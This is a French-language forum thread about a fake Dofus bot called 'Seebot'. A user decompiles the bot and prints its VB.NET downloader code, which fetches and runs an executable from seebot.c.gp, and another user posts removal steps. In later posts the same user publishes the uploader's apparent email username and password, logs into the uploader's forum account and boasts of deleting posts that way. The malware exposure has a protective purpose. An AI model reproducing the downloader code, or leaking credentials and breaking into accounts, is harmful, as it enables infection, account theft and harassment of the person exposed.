Seebot

    Publicités

Users Who Are Viewing This Thread (Total: 0, Members: 0, Guests: 0)

auronking

Membre actif
Apr 30, 2011
359
1
924
Il ressemble a warz? c'est toi warz ta nouvelle identité pour arrêter warz et faire ce nouveau bot?
 

balanono

Membre Banni
May 16, 2011
163
0
441
26
Attention gros virus même après avoir fermé ou redémarré le pc il reste dans le processus.
 

Tenkei

Membre actif
Feb 17, 2011
347
0
436
Lisons lisons.

Tiens donc, c'est bizarre, cette description me rappelle quelque chose.
Oh, mais bien sûr, c'était la description qui était sur le site d'Ideo !

Regardons les screens.

Plus aucun doute, c'est bel et bien Ideo, dont le nom a été vulgairement remplacé par retouche d'image !

-> A partir d'ici, en voyant la copie d'Ideo, je sais donc déjà que c'est un fake.

Bon, téléchargeons quand même, pour voir.
Tiens, c'est étrange, ces DLLs et ces dossiers me rappellent quelque chose aussi !

Mais oui bien sur, ce sont les dossiers qui sont présents à côté d'Anic !
A mon avis, il a dû les mettre pour paraître plus réaliste.

-> En voyant les fichiers et les dossiers présents avec Anic, je confirme que c'est un fake.

Bon, essayons de décompiler ça, juste pour voir.

Oh, que vois-je ? Il n'y a absolument RIEN qui a un moindre rapport avec dofus là dedans.

Code:
Private Sub PictureBox2_Click(ByVal sender As Object, ByVal e As EventArgs)
    MyProject.Computer.Network.DownloadFile("http://seebot.c.gp/Seebot.exe", "C:\Windows\Seebot.exe")
    Process.Start("C:\Windows\Seebot2.exe")
End Sub

-> Nous avons donc la preuve que c'est non seulement un fake, mais qu'en plus il télécharge quelque chose.

Téléchargeons ce second programme pour voir ce que c'est.
Oh, un programme avec l'icone d'autoit, packé avec UPX.
Même pas la peine reverse engineering dessus, balançons ça sur virustotal.

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Oh, très peu de détections pour le moment. Dommage que ça risque fort de monter rapidement.

-> C'est donc bien évidemment un fake complet, un virus, ou tout ce que vous voulez.

Dommage, tu étais bien organisé. Tu n'as pas été assez crédible.

---------- Message ajouté à 22h17 ---------- Le message précédent était à 22h16 ----------

Ah, je viens de voir ta mise à jour. Dé-compilons pour voir ce qui change :

Code:
    MyProject.Computer.Network.DownloadFile("http://seebot.c.gp/seebot.exe", "C:\Programmes\seebot.exe")
    Process.Start("C:\Programmes\seebot.exe")
    Dim num As Integer = Me.ProgressBar1.Value
    Interaction.MsgBox("Chargement en cour !", MsgBoxStyle.OkOnly, Nothing)
    Me.ProgressBar1.Value = (Me.ProgressBar1.Value + 99)

Pas grand chose, visiblement.
 

Seebot

Membre
Nov 6, 2011
40
0
306
29
Lisons lisons.

Tiens donc, c'est bizarre, cette description me rappelle quelque chose.
Oh, mais bien sûr, c'était la description qui était sur le site d'Ideo !

Regardons les screens.

Plus aucun doute, c'est bel et bien Ideo, dont le nom a été vulgairement remplacé par retouche d'image !

-> A partir d'ici, en voyant la copie d'Ideo, je sais donc déjà que c'est un fake.

Bon, téléchargeons quand même, pour voir.
Tiens, c'est étrange, ces DLLs et ces dossiers me rappellent quelque chose aussi !

Mais oui bien sur, ce sont les dossiers qui sont présents à côté d'Anic !
A mon avis, il a dû les mettre pour paraître plus réaliste.

-> En voyant les fichiers et les dossiers présents avec Anic, je confirme que c'est un fake.

Bon, essayons de décompiler ça, juste pour voir.

Oh, que vois-je ? Il n'y a absolument RIEN qui a un moindre rapport avec dofus là dedans.

Code:
Private Sub PictureBox2_Click(ByVal sender As Object, ByVal e As EventArgs)
    MyProject.Computer.Network.DownloadFile("http://seebot.c.gp/Seebot.exe", "C:\Windows\Seebot.exe")
    Process.Start("C:\Windows\Seebot2.exe")
End Sub

-> Nous avons donc la preuve que c'est non seulement un fake, mais qu'en plus il télécharge quelque chose.

Téléchargeons ce second programme pour voir ce que c'est.
Oh, un programme avec l'icone d'autoit, packé avec UPX.
Même pas la peine reverse engineering dessus, balançons ça sur virustotal.

Ce lien n'est pas visible, veuillez vous connecter pour l'afficher. Je m'inscris!

Oh, très peu de détections pour le moment. Dommage que ça risque fort de monter rapidement.

-> C'est donc bien évidemment un fake complet, un virus, ou tout ce que vous voulez.

Dommage, tu étais bien organisé. Tu n'as pas été assez crédible.

---------- Message ajouté à 22h17 ---------- Le message précédent était à 22h16 ----------

Ah, je viens de voir ta mise à jour. Dé-compilons pour voir ce qui change :

Code:
    MyProject.Computer.Network.DownloadFile("http://seebot.c.gp/seebot.exe", "C:\Programmes\seebot.exe")
    Process.Start("C:\Programmes\seebot.exe")
    Dim num As Integer = Me.ProgressBar1.Value
    Interaction.MsgBox("Chargement en cour !", MsgBoxStyle.OkOnly, Nothing)
    Me.ProgressBar1.Value = (Me.ProgressBar1.Value + 99)

Pas grand chose, visiblement.

Le bote et codé en autoit et le fichier us3 et le bot en lui même il utilise les autre fichier pour fonctionnais ;)
 

balanono

Membre Banni
May 16, 2011
163
0
441
26
Comme par hasard le jour où je télécharge le bot quelqu'un ce co sur mon compte dofus (heureusement certif).
Voici la manipulation à faire pour enlever le virus :
Aller dans le gestionnaire des tâches puis processus cherche seebot.exe puis clique droit dessus ensuite cliquez sur ouvrir l'emplacement du fichier puis arrêter le processus puis supprimé seebot.exe dans l'emplacement du fichier (attention vérifié s'il n'y a pas seebot2.exe ou autre seebot.exe
 

Tenkei

Membre actif
Feb 17, 2011
347
0
436
Tss, essaye pas de te rattraper.

Bizarrement tu deviens beaucoup moins clair dans tes explications.

Serais-ce le stress ?
 

Tenkei

Membre actif
Feb 17, 2011
347
0
436
Et maintenant tu t'énerves sans apporter aucun contre-argument contre les miens.

N'insiste pas, tu as perdu. De plus, tu ne sais même pas coder un simple downloader en VB.NET.
 

balanono

Membre Banni
May 16, 2011
163
0
441
26
Un admin pourrais voir si seebot c'est déjà co avec l'ip 90.17.108.32 ? Si c'est sa alors sont bot est un virus.
 

Tenkei

Membre actif
Feb 17, 2011
347
0
436
Ah, une dernière chose pour finir de te faire stresser :

anthony.hamard1995
lilietneness

Enjoy.
 

Seebot

Membre
Nov 6, 2011
40
0
306
29
Salut, ici Tenkei.
Ce boulet a mis le même mot de passe pour gmail et pour cheat-gam3.

Allez-y si vous voulez :

Seebot
lilietneness
 

Tenkei

Membre actif
Feb 17, 2011
347
0
436
Hop, voilà comment supprimer un message sans être modérateur.

Vous pouvez passer votre chemin, y'a plus rien à voir.

---------- Message ajouté à 22h46 ---------- Le message précédent était à 22h41 ----------

Ah, il vient de changer son mot de passe et d'éditer la première page.

Il me fait presque rire.

---------- Message ajouté à 22h47 ---------- Le message précédent était à 22h46 ----------

Ah, et voilà qu'il vient de remettre la description de son fake bot que j'avais supprimé.
Pourquoi t'obstiner autant ?